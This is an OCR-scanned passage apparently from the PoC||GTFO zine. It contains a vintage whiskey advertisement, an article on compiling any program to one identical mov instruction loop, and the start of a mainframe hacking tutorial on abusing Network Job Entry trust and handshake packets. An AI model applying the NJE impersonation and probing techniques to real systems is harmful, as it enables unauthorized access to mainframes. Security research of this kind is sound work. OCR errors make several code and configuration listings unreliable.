Postum Cereal Company, Limited, 
Battle Creek, Mich., U.S.A. 
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HAYNER BOTTLED-IN- 
BOND WHISKEY is oneof 
the choicest whiskies ever dis- 
tilled—rich in quality—mellow 
with age—delicious in flavor 
and aroma. 

IT'S PURE WHISKEY—ab- 
solutely pure to the last drop. 

PURE. Madein strict con- 
formity with the United States 
Pure Food Law and guaranteed 
pure by our affidavit filed with 
the Secretary of Agriculture 
at Washington, Serial No. 
1401. 

PURE. Of the highest 
standard of purity to pass the 
strictest analysis of the Pure 
M Food Commissions of every 

State in the Union. 

PURE. Because it is dis- 
tilled aged and BOTTLED-IN- 
BOND under the direct super- 
vision of the United States 
Government—and its full age, 





full strength and full measure 
are CERTIFIED TO BY 
THE UNITED STATES 
GOVERNMENT as shown by 
IT'S official stamp over the 
cork of every bottle. 

SEND US YOUR ORDER— 
save all the dealers’ profits and 
get this highest grade BOT- 
TLED-IN-BOND whiskey 
direct from distillery at dis- 
tillers’ price. 


OUR OFFER 
We will send you FOUR FULL 
QUART BOTTLES HAYNER 
PRIVATE STOCK BOTTLED- 
IN-BOND WHISKEY for 
$3.20. by express prepaid— 
in plain package with no marks 
to show contents. When you 
get it—try it—every bottle if 
you wish. If not satisfactory, 
return it at our expense and 
we will return your $3.20. 
That's fair—isn’ t it? 





Don’t wait—order to-day and address our nearest shipping depot. 

Orders for Arizona, California, Colorado, Idaho, Montana, Nevada, New 
Mexico, Oregon, Utah, Washington, or Wyoming, must be on the basis of 
4 Quarts for $4 by Express Prepaid, or 20 Quarts for $15.20 by 
Freight Prepaid. 





THE HAYNER DISTILLING CO., Div. 1408 


Dayton, Ohio. St. Louis, Mo. St. Paul, Minn. _ Atlanta, Ga. 
153 Distillery, Troy, Ohio. Capital, $500,000.00 Full Paid. 
ESTABLISHED 1866. 
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5 A Crisis of Existential Import; or, 
Putting the VM in M/o/Vfuscator 


























mov esi, offset ops mov esi, offset ops 
[ly | yy 

loop: loop: 

mov ebx, [esi] mov ebx, [esi] 

mov ebx, [ebx] mov ebx, [ebx] 

add ebx, [esi+4] add ebx, [esi+4] 

mov ebx, [ebx] mov ebx, [ebx] 

mov edx, [esi+8] mov edx, [esi+8] 

mov edx, [edx] mov edx, [edx] 

add edx, [esi+0Ch] add edx, [esi+0Ch] 

mov [edx], ebx mov [edx], ebx 

add esi, 10h add esi, 10h 

jmp short loop jmp short loop 

E. ^. -— 

AES Minesweeper 


A programmer writes code. That is his purpose: 
to define the sequence of instructions that must be 
carried out to perform a desired action. Without 
code, he serves no purpose, fulfills no need. What 
then would be the effect on our existential selves if 
we found that all code was the same, that every pro- 
gram could be written and executed exactly as every 
other? What if the net result of our century of work 
was precisely ... nothing? 


Here, we demonstrate that all programs, on all 
architectures,?? can be reduced to the same instruc- 
tion stream; that is, the sequence of instructions 
executed by the processor can be made identical 
for every program. On careful analysis, it is nec- 
essary to observe that this is subtly distinct from 
prior classes of research. In an interpreter, we might 
say that the same instructions (those that compose 
the VM) can execute multiple programs, and this is 
correct; however, in an interpreter the sequence of 
the instructions executed by the processor changes 
depending on the program being executed—that is, 
the instruction streams differ. Alternatively, we note 
that it has been shown that the x86 MMU is itself 
Turing-complete, allowing a program to run with no 
instructions at all.?? 


In this sense, on x86, we could argue that any 
program, compiled appropriately, could be reduced 
to no instructions—thereby inducing an equivalence 
in their instruction streams. However, this peculiar- 
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ity is unique to x86, and it could be argued that the 
MMU is then performing the calculations, even if 
the processor core is not—different calculations are 
being performed for different programs, they are just 
being performed "elsewhere." 

Instead, we demonstrate that all programs, on 
any architecture, could be simplified to a single, 
universal instruction stream, in which the compu- 
tations performed are precisely equivalent for every 
program—if we look only at the instructions, rather 
than their data. 

In our proof of concept, we will illustrate reduc- 
ing any C program to the same instruction stream on 
the x86 architecture. It should be straightforward to 
understand the adaptation to other languages and 
architectures. 

We begin the reduction with a rather ridiculous 
tool called the M/o/Vfuscator. The M/o/Vfusca- 
tor allows us to compile any C program into only 
x86 mov instructions. That is not to say the in- 
structions are all the same—the registers, operands, 
addressing modes, and access sizes vary depending 
on the program—but the instructions are all of the 
mov variety. What would be the point of such a 
thing? Nothing at all, but it does provide a useful 
beginning for us—by compiling programs into only 
mov instructions, we greatly simplify the instruc- 
tion stream, making further reduction feasible. The 
mov instructions are executed in a continuous loop, 
and compiling a program?! produces an instruction 
stream as follows: 








start: 
mov 
mov 
mov 


mov 
mov 

mov ... 
jmp start 





32Perhaps it is necessary to specify, Turing-complete architecture. 
33See The Page-Fault Weird Machine: Lessons in Instruction-less Computation by Julian Bangert et al., USENIX WOOT'13 
or the 29C3 talk “The Page Fault Liberation Army or Gained in Translation" by Bangert & Bratus 


34movec -Wf-no-mov-loop program.c -o program 
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But our mov instructions are of all varieties— 
from simple mov eax, edx to complex mov dl, 
[esit4*ecx+0x19afc09], and everything in be- 
tween. Many architectures will not support such 
complex addressing modes (in any instruction), so 
we further simplify the instruction stream to pro- 
duce a uniform variety of movs. Our immediate goal 
is to convert the diverse x86 movs to a simple, 4-byte, 
indexed addressing varieties, using as few registers 
as possible. This will simplify the instruction stream 
for further processing and mimic the simple load and 
store operations found on RISC type architectures. 
As an example, let us assume 0x10000 is a 4-byte 
scratch location, and esi is kept at 0. Then 








mov eax, edx 





can be converted to 








mov [0x10000+esi], edx 
mov eax, [0x10000+esi | 





We have replaced the register-to-register mov va- 
riety with a standard 4-byte indexed memory read 
and write. Similarly, if we pad our data so that an 
oversized memory read will not fault, and pad our 
scratch space to allow writes to spill, then 








mov al, 


[0x20000] 





can be rewritten 








[0x10000+esi], eax 
edi, [0x20000—3+esi] 
[0x10000—3+esi], edi 
eax, [0x10000+esi | 


mov 
mov 
mov 
mov 





For more complex addressing forms, such as mov 
dx, [eax+4*ebx+Oxdeadbeef], we break out the 
extra bit shift and addition using the same technique 
the M/o/Vfuscator uses—a series of movs to perform 
the shift and sum, allowing us to accumulate (in the 
example) eax*4*ebx into a single register, so that 
the mov can be reduced back to an indexed address- 
ing eax+0xdeadbeef. 

With such transforms, we are able to rewrite our 
diverse-mov program so that all reads are of the form 
mov esi/edi, [base + esi/edi] and all writes of 
the form mov [base + esi/edil, esi/edi, where 














base is some fixed address. By inserting dummy 
reads and writes, we further homogenize the instruc- 
tion stream so that it consists only of alternating 
reads and writes. Our program now appears as (for 
example): 














start: 

mov esi, [0x149823 + edil] 
mov [0x9fba09 + esi], esi 
mov edi, [0x401ab5 + edi] 
mov [0x3719ff — esi], edi 
jmp start 








'The only variation is in the choice of register and 
the base address in each instruction. This simplifica- 
tion in the instruction stream now allows us to more 
easily apply additional transforms to the code. In 
this case, it enables writing a non-branching mov in- 
terpreter. We first envision each mov as accessing 
"virtual," memory-based registers, rather than CPU 
registers. This allows us to treat registers as sim- 
ple addresses, rather than writing logic to select be- 
tween different registers. In this sense, the program 
is now 











start: 

MOVE | esi], [0x149823 + [ edil] 
MOVE [0x9fba09 + [_esi]], [ esi] 
MOVE [ edil, [0x401ab5 + [ edi]] 
MOVE [0x3719ff + [_esi]], [ edi] 





jmp start 








where |. esi and edi are labels on 4-byte mem- 
ory locations, and MOVE is a pseudo-instruction, ca- 
pable of accessing multiple memory addresses. With 
the freedom of the pseudo-instruction MOVE, we can 











simplify all instructions to have the exact same form: 
start: 

MOVE [0 + [ esi]], [0x149823 + [ edi]] 

MOVE [0x9fba09 + [_esi]], [0 + [ esi]] 

MOVE [0 + [ edil], [0x401ab5 + [ edi]] 

MOVE [0x3719ff + [ esill, [0 + [ edil] 








jmp start 
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We can now define each MOVE by its tuple of 
memory addresses: 

















(0, esi, 0x149823, _edi) 
(0x9fba09, esi, 0, _ esi} 

(0, edi, Ox401ab5, _ edi} 
(0x3719ff, esi, 0, _ edi} 

and write this as a list of operands: 

operands: 

.long 0, esi, 0x149823, _ edi 
-long 0x9fba09, esi, O, esi 
-long 0, edi, 0x40lab5, edi 
.long 0x3719ff, esi, 0, edi 





We now write an interpreter for our pseudo-mov. 
Let us assume the physical esi register now holds 
the address of a tuple to execute: 














; a pseudo—move 
; Read the data from the source. 
mov ebx, [esi+0] ; Read the address of the 
; virtual index register. 
mov ebx, [ebx] ; Read the virtual index 
; register. 
add ebx, [esi+4] ; Add the offset and 
; index registers to 
; compute a source 
; address. 
mov ebx, [ebx] ; Read the data from the 
; computed address. 
; Write the data to the destination. 
mov edx, [esi+8] ; Read the address of the 
; virtual index register. 
mov edx, [edx] ; Read the virtual index 
; register. 
add edx, [esi+12] ; Add the offset and 
; index registers to 
; compute a destination 
; address. 


mov [edx], ebx ; Write the data to the 


; destination address. 
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Finally, we execute this single MOVE interpreter 
in an infinite loop. 'To each tuple in the operand 
list, we append the address of the next tuple to ex- 
ecute, so that esi (the tuple pointer) can be loaded 
with the address of the next tuple at the end of each 
transfer iteration. This creates the final system: 








mov esi, operands 








loop: 

mov ebx, [esi+0] 
mov ebx, [ebx] 
add ebx, [esi+4] 
mov ebx, [ebx] 
mov edx, [esi+8] 
mov edx, [edx] 
add edx, [esi+12] 
mov [edx], ebx 
mov esi, [esi--16] 
jmp loop 








'The operand list is generated by the compiler, 
and the single universal program appended to it. 
With this, we can compile all C programs down to 
this exact instruction stream. The instructions are 
simple, permitting easy adaptation to other archi- 
tectures. There are no branches in the code, so the 
precise sequence of instructions executed by the pro- 
cessor is the same for all programs. The logic of 
the program is effectively distilled to a list of mem- 
ory addresses, unceremoniously processed by a mun- 
dane, endless data transfer loop. 


So, what does this mean for us? Of course, not so 
much. It is true, all “code” can be made equivalent, 
and if our job is to code, then our job is not so inter- 
esting. But the essence of our program remains—it 
had just been removed from the processor, diffused 
instead into a list of memory addresses. So rather, 
I suppose, that when all logic is distilled to noth- 
ing, and execution has lost all meaning—well, then, 
a programmer's job is no longer to “code,” but rather 
to “data!” 


This project, and the proof of concept reduc- 
ing compiler, can be found at Github?? and as an 
attachment.?6 The full code elaborates on the pro- 
cess shown here, to allow linking reduced and non- 
reduced code. Examples of AES and Minesweeper 
running with identical instructions are included. 





35git clone https://github.com/xoreaxeaxeax/reducto 
36unzip pocorgtfo12.pdf reducto.tgz 
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6 A JCL Adventure with Network Job Entries 


Mainframes. Long the cyberpunk mainstay of 
expert hackers, they have spent the last 30 years in 
relative obscurity within the hallowed halls of hack- 
ers/crackers. But no longer! There are many ways 
to break into mainframes, and this article will out- 
line one of the most secret components hushed up 
within the dark corners of mainframe mailing lists: 
Network Job Entry (NJE). 


6.1 Operating System and Interac- 
tion 


With the advent of the mainframe, IBM really had a 
winner on their hands: one of the first multipurpose 
computers that could serve multiple different activ- 
ities on the same hardware. Prior to OS/360, you 
only had single-purpose computers. For example, 
you'd get a machine that helps you track inventory 
at all your stores. It worked so well that you figured 
you wanted to use it to process your payroll. No 
can do, you needed a separate bespoke system for 
that. Enter IBMs OS/360, and, from large to small, 
you had a system that was multipurpose but could 
also scale as your needs did. It made IBM billions, 
which was good because it almost cost the company 
its very existence. OS/360 was released in 1964 and 
(though re-written entirely today) still exists around 


Network Job Entry 
H4CKR 


NJHTOUSER 


LK 


32 


by Soldier of Fortran 


the world as z/OS. 

z/OS is composed of many different components 
that this article doesn't have the time to get in to, 
but trust me when I say there are thousands of 
pages to be read out there about using and oper- 
ating z/OS. A brief overview, however, is needed to 
understand how NJE (Network Job Entry) works, 
and what you can do with it. 


6.1.1 Time Sharing and UNIX 


You need a way to interact with z/OS. There are 
many different ways, but I'm going to outline two 
here: OMVS and TSO. 

OMVS is the easiest, because it's really just 
UNIX. In fact, you'll often hear USS, or Unix Sys- 
tem Services, mentioned instead of OMVS. For the 
curious, OMVS stands for Open MVS; (MVS stands 
for Multiple Virtual Storage, but I'll save virtual 
storage for its own article.) Shown in Figure 6, 
OMVS is easy—because it's UNIX, and thus uses 
familiar UNIX commands. 

TSO is just as easy as OMVS—when you under- 
stand that it is essentially a command prompt with 
commands you've never seen or used before. TSO 
stands for Time Sharing Option. Prior to the com- 
mon era, mainframes were single-use—you'd have a 











































































































stack of cards and have a set time to input them and 
wait for the output. Two people couldn't run their 
programs at the same time. Eventually, though, it 
became possible to share the time on a mainframe 
with multiple people. This option to share time was 
developed in the early 70s and was optional until 
1974. Figure 7 shows the same commands as in Fig- 
ure 6, but this time in TSO. 


6.1.2 Datasets and Members; Files and 
Data 
In the examples above you had a little taste of 


the file system on z/OS. UNIX (or OMVS) looks 
and feels like UNIX, and it's a core component of 
the operating system. However, its file system re- 
sides within what we call a dataset. Datasets are 
what z/OS people would refer to as files/folders. A 
dataset can be a file or folder composed of either 
fixed-length or variable-length data.?" You can also 
create what is called a PDS or Partitioned DataSet: 
what you or I would call a folder. Let's take a look 
at the TSO command listds again, but this time 
we'll pass it the parameter members. 











listds ’dade.example’ members 
DADE. EXAMPLE 
—RECFM-LRECL-BLKSIZE-DSORG 
FB 80 27920 PO 
——VOLUMES-— 


PUBLIC 





Here we can see that the file EXAMPLE was in 
fact a folder that contained the files MANIFEST and 
PHRACK. Of course this would be too easy if they 
just called it “files” and “folders” (what we're all used 
to)—but no, these are called datasets and members. 

Another thing you may be noticing now is that 
there seem to be dots instead of slashes to denote 
folders/files hierarchy. It’s natural to assume—if 
you don't use mainframes—that the nice comforting 
notion of a hierarchy carries over with some min- 
imal changes—but you'd be wrong. z/OS doesn't 
really have the concept of a folder hierarchy. The 
files dade.filei.g2 and dade.file2.g2 are sim- 
ply named this way for convenience. The locations, 
on disk, of various datasets, etc. are controlled by 
the system catalogue—which is another topic to save 
away for a future article. Regardless, those dots do 
serve a purpose and have specific names. The text 
before the first dot is called a High Level Qualifier, or 
HLQ. This convention allows security products the 
ability to provide access to clusters of datasets based 


37 Mainframe experts, this is a very high level discussion. Please don't beat me up about various dataset types! 
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> ls -l 


total 32 

—rw—r—r— 1 MARGO SYS1 596 Mar 9 13:08 manifest 
—rw—r—r— 1 MARGO SYS1 1494 Mar 9 13:09 phrack.txt 

> cat manifest 

This is our world now... the world of the electron and the switch, the 


beauty of the baud. We make use of a service already existing without paying 
for what could be dirt—cheap if it wasn’t run by profiteering gluttons, and 


you call us criminals. We explore... and you call us criminals. We seek 
after knowledge... and you call us criminals. We exist without skin color, 
without nationality , without religious bias... and you call us criminals. 


You build atomic bombs, you wage wars, you murder, cheat, and lie to us 


and try to make us believe it's for our own good, yet we're the criminals. 
> cat "//"DADE.EXAMPLE( phrack) '" 


IVI N 
|_11_[etal/ /hop 


y AA | 
(314) 432-0756 
24 Hours A Day, 300/1200 Baud 


Presents.... 


==Phrack Inc.== 
Volume One, Issue One, Phile 1 of 8 


Introduction... 
> netstat 
MVS TCP/IP NETSTAT CS V3R5 TCPIP Name: TCPIP 13:16:16 
User Id Conn Local Socket Foreign Socket State 


TN3270 0000000B 0.0.0.0..23 0.0.0.0..0 Listen 








Figure 6 - OMVS 
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READY 
listds example 
DADE. EXAMPLE 
——RECFN-LRECL-BLKSIZE-DSORG 
FB 80 27920 PO 
——VOLUMES— 
PUBLIC 
edit 'dade.example(manifest)" text 
IKJ523381 DATA SET 'DADE.EXAMPLE(MANIFEST) ' NOT LINE NUMBERED, USING NONUM 
EDIT 
list 
This is our world now... the world of the electron and the switch, the 
beauty of the baud. We make use of a service already existing without paying 
for what could be dirt—cheap if it wasn't run by profiteering gluttons, and 


you call us criminals. We explore... and you call us criminals. We seek 
after knowledge... and you call us criminals. We exist without skin color, 
without nationality , without religious bias... and you call us criminals. 


You build atomic bombs, you wage wars, you murder, cheat, and lie to us 

and try to make us believe it's for our own good, yet we're the criminals. 
IKJ525001 END OF DATA 

end 

READY 

netstat 

EZZ23501 MVS TCP/IP NETSTAT CS V3R5 'TCPIP Name: TCPIP 18:23:42 
EZZ2585I User Id Conn Local Socket Foreign Socket State 
EZZ25861 ——————————— ——— 
EZZ25871 TN3270 0000000B 0.0.0.0..23 0.0.0.0..0 Listen 








listds lists a dataset. This command is similar to 1s. 
edit ’dade.example(manifest)’ text/list lists the contents of a file. 


netstat is good ol' netstat. 


Figure 7 - TSO 
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on the HLQ. The other “levels” also have names, but 
we can just call them qualifiers and move on. For 
example, in the listds example above we wanted 
to see the members of the file DADE.EXAMPLE 
where the HLQ is DADE. 


6.1.3 Jobs and Languages 


Now that you understand a little about the file sys- 
tem and the command interfaces, it is time to in- 
troduce JES2 and JCL. JES2, or Job Entry Subsys- 
tem v2, is used to control batch operations. What 
are batch operations? Simply put, these are auto- 
mated commands/actions that are taken program- 
matically. Let's say you're McDonalds and need to 
process invoices for all the stores and print the re- 
sults. The invoice data is stored in a dataset, you do 
some work on that data, and print out the results. 
You'd use multiple different programs to do that, so 
you write up a script that does this work for you. 
In z/OS we'd refer to the work being performed as 
a job, and the script would be referred to as JCL, or 
Job Control Language. 

There are many options and intricacies of JCL 
and of using JCL, and I won't be going over those. 
Instead, I'm going to show you a few examples and 
explain the components. 

In Figure 8 is a very simple JCL file. In JCL 
each line starts with a //. This is required for every 
line that's not parameters or data being passed to 
a program. The first line is known as the job card. 
Every JCL file starts with it. In our example, the 
NAME of the job is USSINFO, then comes the TYPE 
(JOB) followed by the job name (JOBNAME) and 
programs exec cat and netstat. The remaining 
items can be understood by reading documentation 
and tutorials.?? 

Next we have the STEP. We give each job step 
a name. In our example, we gave the first step 
the name UNIXCMD. This step executes the program 
BPXBATCH. 

What the hell is BPXBATCH? Essentially, all UNIX 
programs, commands, etc., start with BPX. In our 
JCL, BPXBATCH means “UNIX BATCH”, which is ex- 
actly what this program is doing. It's executing 
commands in UNIX through JES as a batch process. 
So, using JCL we EXECute the ProGraM BPXBATCH: 
EXEC PGM-BPXBATCH 

Skipping STDIN and STDOUT (it means just use 
the defaults) we get to STDPARM. These are the op- 
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tions we wish to pass to BPXBATCH (PARM stands 
for parameters). It takes UNIX commands as its 
options and executes them in UNIX. In our exam- 
ple, it's catting the file example/manifest and dis- 
playing the current IP configuration with netstat 
home. If you ran this JCL, it would cat the file 
/dade/example/manifest, execute netstat home, 
and print any output to STDOUT, which really means 
it will print it to the log of your job activities. 

If, instead of using UNIX commands, you wanted 
to execute TSO commands, you could use IK- 
JEFTO1, as in Figure 9. 


6.1.4 Security 


You need to understand that OS/360 didn't really 
come with security, and it wasn't until SHARE in 
1974 that the decision to create security products 
for the mainframe was made. IBM didn't release the 
first security product for the mainframe until 1976. 
Later, competing products would be released, specif- 
ically ACF2 in 1978 and Top Secret sometime after 
that. IBM's security product was RACF, or Re- 
source Access Control Facility, and is what is com- 
monly referred to as a SAF, or Security Access Fa- 
cility (ACF2/Top Secret are also SAFs). 

Within RACF you have classes and permissions. 
You can create users, assign groups. You get what 
you'd expect from modern identity managers, but 
it's very arcane and the command syntax makes no 
sense. For example, to add a user the command is 
ADDUSER: 








ADDUSER ZEROKUL NAME( ' Dade Murphy’) TSO(TSO( 
ACCINUM(E133T3) PROC(STARTUP)) (OMVS(UID 
(31337) HOME(/u/ZEROKUL) PROGRAM( / bin / 
tcsh)) DELTGRP(SYSOM) OWNER(SYSADM) 





Adding a group is similar. Luckily, as with all 
things, z/OS IBM has really good documentation 
on how to use RACF. 

The key thing to know is that RACF is one huge 
database stored as data within a dataset. (You can 
see the location by typing RVARY.) 


6.1.5 Networking 


Mainframes run a full TCP/IP stack. This shouldn't 
really come as a shock, as you saw NETSTAT above! 
TCP/IP has been available since the 80s on z/OS 


385ttp://www.tutorialspoint.com/jcl/jcl. job statement.htm 
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//USSINFO JOB (JOBNAME),'exec cat and netstat ', CLASS-A, 
MSGLEVEL- (0,0), MSGCLASS=K, NOTIFY=€35 YSUID 

//UNIXCMD EXEC PGM-BPXBATCH 

J [2 RK ACK 

//* JCL to get system info 

J [26 SEE e koh ke CK kk ok 

//STDIN DD SYSOUT=* 

//STDOUT DD SYSOUT=* 

//STDPARM DD = 


sh cat example/manifest; netstat home 


/* 





Figure 8 — Simple JCL file 








//TSOINFO JOB (JOBNAME) ,’ exec netstat ’,CLASS=A, 
MSGLEVEL= (0,0), MSGCLASS=K, NOTIFY=€35 YSUID 


//TSOCMD EXEC  PGM-IKJEFTO1 
//SYSTSPRT DD SYSOUT=« 
//SYSOUT DD SYSOUT=x 


//SYSTSIN DD x 
LISTDS 'DADE.EXAMPLE” MEMBERS 
NETSTAT HOME 


Ja 





Figure 9 - IKJEFTOI for executing TSO commands. 








and has slowly replaced SNA (System Network Ar- 
chitecture, a crazy story beyond the scope of this 
article). 


TCP/IP is configured in a parmlib. I’m being 
vague here, not to protect the innocent, but be- 
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cause z/OS is so configurable that you can put these 
configuration files anywhere. Likely, however, you'll 
find it in SYS1.TCPPARMS (a PDS). 


So, we’ve got TCP/IP configured and ready to 
go, and we understand that a lot of a mainframe’s 


















































THIS IS A LARGE ROOM FULL OF ASSORTED HEAVY MACHINERY, WHIRRING NOISILY. THE ROOM SMELLS 
OF BURNED RESISTORS. ALONG ONE WALL ARE THREE BUTTONS WHICH ARE, RESPECTIVELY, ROUND, 
TRIANGULAR, AND SQUARE. NATURALLY, ABOVE THESE BUTTONS ARE INSTRUCTIONS WRITTEN IN 
EBCDIC... 
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power comes from batch processing. So far so good. 


6.2 Network Job Entry 


Understand that mainframes are expensive. Very 
expensive. When you buy one, you're not in it for 
the short term. But, say you're an enterprise in the 
80s and have a huge printing facility designed to 
print checks in New Mexico. You buy a mainframe 
to handle all the batch processing of those printers 
and keep track of what was printed where and when. 
Unfortunately, the data needed for those checks is 
kept in a system in Ohio, and only the system in 
Idaho knows when it's ready to kick off new print 
jobs automatically. Enter Network Job Entry. 

Using Network Job Entry (or NJE), you can sub- 
mit a job in one environment, say the Idaho main- 
frame POTATO, and have it execute the JCL on a 
different system, for example the New Mexico main- 
frame CACTUS. 


JCL 
[= 


Potato 


Cactus 





An interesting property of NJE, depending on 
the setup, is that in the default configuration JES2 
will take the userid of the submitter and pass that 
along to the target system. If that user exists on the 
target system and has the appropriate permissions, 
it will execute the job as that user. No password, 
or tokens. How it does this is explained below in 
section 4.1. 

Here's the same UNIX JCL we saw above, but 
this time, instead of executing on our local system 
(CACTUS), it will execute on POTATO: 


HG 
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//USSINFO JOB (JOBNAME) ,’exec id on potato 
' CLASS-A, 

// MSGLEVEL= (0,0) ,MSGCLASS-K, 
NOTIFY-&SYSUID 

/* XEQ POTATO 

//UNIXCMD EXEC PGM-BPXBATCH 

//STDIN DD SYSOUT-x 

//STDOUT DD SYSOUT-x 

//STDPARM DD * 

sh id 

/* 





The new line “/*XEQ POTATO” tells JES2 we’d 
like to execute this on POTATO, instead of our lo- 
cal system. 

Within NJE these systems are referred to as 
nodes in a trusted network of mainframes. 


6.2.1 The Setup 


NJE can use SNA, but most companies use TCP /IP 
for their NJE setup today. Configuring NJE requires 
a few things before you get started. First, you'll 
need the IP addresses for the systems in your NJE 
network, then you need to assign names to each sys- 
tem (these can be different than hostnames), then 
you turn it all on and watch the magic happen. 
You'll need to know all the nodes before you set 
this up; you can’t just connect to a running NJE 
server without it being defined. 
Let’s use our example from before: 





System Name IP 

System 1 POTATO 10.10.10.1 

System 2 CACTUS  10.10.10.2 

Somewhere on the mainframe there will 
be the JES2 startup procedures, likely in 


SYS1.PARMLIB(JES2PARM), but not always. In that 
file there will be a few lines to declare NJE set- 
tings. The section begins with NJEDEF, where the 
number of nodes and lines are declared, as well as 
the number of your own node. Then, the nodes 
are named, with the NODE setting and the socket 
setup with NETSRV, LINE, and SOCKET as shown in 
Figure 10. 

With this file you can turn on NJE with the 
JES2 console command $S NETSERV1. This will en- 
able NJE and open the default port, 175, waiting for 
connections. To initiate the connection, you could 
connect from POTATO to CACTUS with this JES2 
command: $SN,LINE1,N=CACTUS, or, to go the other 
way, $SN,LINE1,N=POTATO. 





00 


10 


You can also password protect NJE by adding 
the PASSWORD variable on the NODE lines: 








NODE(1) 
NODE(2) 


NAME-POTATO, PASSWORD=0HI10 1234 
NAME-CACTUS, PASSWORD-NJEROCKS 








The commands, in this case, don't change when 
you connect, but a password is sent. These pass- 
words don't need to be the same, as you can see 
in the example. But once you start getting five or 
more nodes in a network, all with different pass- 
words, managing these configs can become a pain, 
so most places just use a single, shared password, if 
they use passwords at all. 

NJE communication can also use SSL, with a de- 
fault port of 2252. If you're not using SSL, all data 
sent across the network is sent in cleartext. 

With this setup we can send commands to the 
other nodes by using the $N JES2 command. To dis- 
play the current nodes connected to POTATO from 
CACTUS, you'd enter $N 1,’$D NODE’ and get the 
output: 











16.54.08 $HASP826 NODE(1) 
16.54.08 $HASP826 NODE(1) 
NAME-POTATO, STATUS-(OWNNODE) , 
TRANSMIT-BOTH, 
16.54.08 $HASP826 
RECEIVE=BOTH, HOLD=NONE 
16.54.08 $HASP826 NODE(2) 
16.54.08 $HASP826 NODE(2) 
NAME-CACTUS, STATUS=(VIA/LNE1) , 
TRANSMIT=BOTH, 
16.54.08 $HASP826 RECEIVE-BOTH, HOLD-NONE 











These commands, sent with $N, are referred to 
as Nodal Message Records or NMR. 


HG 
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6.2.2 Nodes! 


The current setup will only allow NMRs to be sent 
from one node to another. We need to set up trust 
between these systems. Thankfully, with RACF this 
is a fairly easy and painless setup. This setup can 
be done with the following commands on POTATO. 
Note, this is ultra insecure! Do not use this type of 
setup if you are reading this. This is just an example 
of what the author has seen in the wild: 








RDEFINE RACFVARS &RACLNDE UACC(NONE) 
RALTER RACFVARS &RACLNDE ADDMEM(CACTUS) 
SETROPTS CLASSACT(RACFVARS) RACLIST (RACFVARS 


) 
SETROPTS RACLIST(RACFVARS) REFRESH 





What this does is tell RACF that, for any job 
coming in from CACTUS, POTATO can assume 
that the RACF databases are the same. NJE 
doesn't actually require users to sign in or send pass- 
words between nodes. Instead, as described in more 
detail below, it attaches the submitting the user's 
userid from the local node and passes that informa- 
tion to the node expected to perform the work. With 
the above setup the local node assumes that the 
RACF databases are the same (or similar enough), 
and that users from one system are the same on an- 
other. This isn't always the case and can easily be 
manipulated to our advantage. Thus, in our current 
setup to submit work from one system to another, 
the user jsmith would have to exist on both. 











System 1: POTATO System 2: CACTUS 
NJEDEF NODENUM-2, NJEDEF NODENUM-2, 
OWNNODE-1, OWNNODE-2, 
LINENUM-1, LINENUM-1 
NODE(1) NAME=POTATO NODE(1) NAME=POTATO 
NODE(2) NAME=CACTUS NODE(2) NAME-CACTUS 
NETSRC(1) SOCKET-LOCAL | NETSRC(1) SOCKET=LOCAL 
LINE(1) UNIT=TCPIP LINE(1) UNIT=TCPIP 
SOCKET(CACTUS) NODE=2, SOCKET(POTATO) NODE-1, 
IPADDR=10.10.10.2 IPADDR=10.10.10.1 





Figure 10 — Nodes in our network 
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JL CRACKING IS 


pie ROTECTIONS 


KILLING P 






AND ITS AWESOME 


6.3 Inside NJE 


With the high level discussion out of the way, 
it's time to dissect the innards of NJE, so we 
can make it do what we want. Fortunately, IBM 
has documented how NJE works in the document 
has2a620.pdf or more commonly known as “Net- 
work Job Entry Formats and Protocols.” Through- 
out the rest of this article, you’ll see page references 
to the sections within this document that describe 
the process or record format being discussed. 


6.3.1 The Handshake 


Tm not going to go into the TCP/IP handshake, as 
you should be already familiar with it. After you’ve 
established a TCP connection nothing happens, lit- 
erally. If you find an open port on an NJE server 
and connect to it with anything, the server will not 
send a banner or let you know what’s up. It just 
sits there and waits. It waits for a very specific ini- 
tialization packet that is 33 bytes long.?? Figure 11 
shows a breakdown of this packet. 

Taking a look at a connection to POTATO from 
CACTUS, we see that CACTUS sends the packet in 
Figure 12 and receives the packet in Figure 13. 

This is the expected response when sending valid 
OHOST and RHOST fields. If you send an OPEN, 
and either of those are incorrect, you get a NAK re- 
sponse TYPE, followed by 24 zeroes and a reason 
code. Notice that you don't need a valid OIP/RIP; 
it can be anything. 

Here's the reply when we send an RHOST and 
an OHOST of FAKE: 

39See page 189 of has2a620. pdf. 
40See page 13 of has2a620.pdf. 


See page 194 of has2a620. pdf. 
42See page 111 of has2a620. pdf. 
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al 


40 


D5 C1 D2 40 40 40 40 40 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 01 

See if you can decode what the first 3 bytes mean! 


6.3.2 SOH WHAT? 


Once an ACK NJE packet is received, the server is 
expecting a SOH/ENQ packet. From this point 
on, every NJE packet sent is surrounded by a TTB 
and a TTR.*! I’m sure these had acronyms at some 
point, but this is no longer documented. We just 
need to know that a TTB is 8 bytes long with the 
third and fourth bytes being the length of the packet 
plus itself. Think of the B as BLOCK. Following the 
TTB is a TTR. An NJE packet can have multiple 
TTRs but only one TTB. A TTR is 4 bytes long 
and represents the length of the RECORD. SOH in 
EBCDIC is 0x01, ENQ is 0x2D.This is what this all 
looks like together: 











| TIR TTB ISO| 
00 00 00 12 00 00 00 00 00 00 00 02 01 


|EN|-— TTR ——| 
|2D 00 00 00 00 





Notice that in some instances there's also a TTR 
footer of four bytes of 0x00. 
The NJE server replies with: 











| TTR TTB [DL | 
00 00 00 12 00 00 00 00 00 00 00 02 10 


| AQ|-— TTR ——-| 
70 00 00 00 00 





or DLE (0x10) ACKO (0x70). These are the ex- 
pected control responses to our SOH/ENQ. 
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Name Length (bytes) | Encoding | Description 
TYPE 8 | EBCDIC | One of OPEN (open a connection), ACK (acknowledge a 
connection) or NAK (deny a connection). Padded with 
spaces. 
RHOST 8 | EBCDIC | The name of the originating node, padded with spaces. 
RIP 4 | — The IP address of the originating node. 
OHOST 8 | EBCDIC | Padded name of the node you're trying to connect to. 
OIP 4 | — IP address of target node. 
R 1 | — Reason code for NAK (0x01 or 0x04). 
Figure 11 — 33-byte NJE handshake packet 
TYPE OHOST OIP RHOST 
D6 D7 C5 D5 40 40 40 40 D7 D6 E3 C1 E3 D6 40 40 0A OD 25 0A C3 C1 C3 E3 E4 E2 40 40 
OPEN POT ATO 1013 37 10C A C T US 
RIP- — — — R 


0A 0A 0A 02 00 
10 10 10 02 0 





Figure 12 - CACTUS sends this packet. 




















